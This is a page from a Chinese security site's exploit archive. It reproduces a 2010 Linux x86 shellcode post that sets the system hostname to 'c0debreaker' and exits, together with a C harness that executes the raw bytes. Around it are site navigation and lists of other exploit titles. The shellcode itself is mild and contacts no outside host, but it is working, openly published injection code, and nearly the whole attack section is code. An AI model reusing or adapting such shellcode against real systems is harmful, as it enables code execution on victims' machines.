首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 sethostname to "c0debreaker" shellcode 37 bytes
来源:yudha.gunslinger[at]gmail.com 作者:gunslinger_ 发布时间:2010-08-09  
/*
Title  : sethostname to "c0debreaker" linux shellcode .
Name   : 37 bytes sethostname to "c0debreaker" linux .
Date   : Fri Aug  6 21:41:20 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>

char shellcode[] =
		"\xeb\x13"                    /* jmp    0x8048075 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x4a"                    /* mov    $0x4a,%al */
		"\x5b"                        /* pop    %ebx */
		"\x31\xc9"                    /* xor    %ecx,%ecx */
		"\xb1\x0b"                    /* mov    $0xb,%cl */
		"\xcd\x80"                    /* int    $0x80 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x01"                    /* mov    $0x1,%al */
		"\x31\xdb"                    /* xor    %ebx,%ebx */
		"\xcd\x80"                    /* int    $0x80 */
		"\xe8\xe8\xff\xff\xff"        /* call   0x8048062 */
		"\x63\x30"                    /* arpl   %si,(%eax) */
		"\x64\x65\x62\x72\x65"        /* bound  %esi,%fs:%gs:0x65(%edx) */
		"\x61"                        /* popa    */
		"\x6b"                        /* .byte 0x6b */
		"\x65"                        /* gs */
		"\x72";                       /* .byte 0x72 */
		

int main(void)
{
		fprintf(stdout,"[*] Shellcode length: %d\n",strlen(shellcode));
		((void (*)(void)) shellcode)();
	
		return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Visual MP3 Splitter & Joiner 6
·Free MP3 CD Ripper 2.6 (.wav/.
·AtomixMP3 2.3 .m3u File Buffer
·cms star Database Disclosure E
·ffdshow Video Codec Denial of
·Esinti Defterv 6.1 Database Di
·myMP3-Player v3.0 Buffer Overf
·Destiny Media Player 1.61 (.m3
·Advanced File Vault(eSellerate
·myMP3-Player 3.0 (.m3u) File B
·Mini-stream Ripper v3.1.2.1 Bu
·CoolPlayer219_Bin (.m3u) File
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved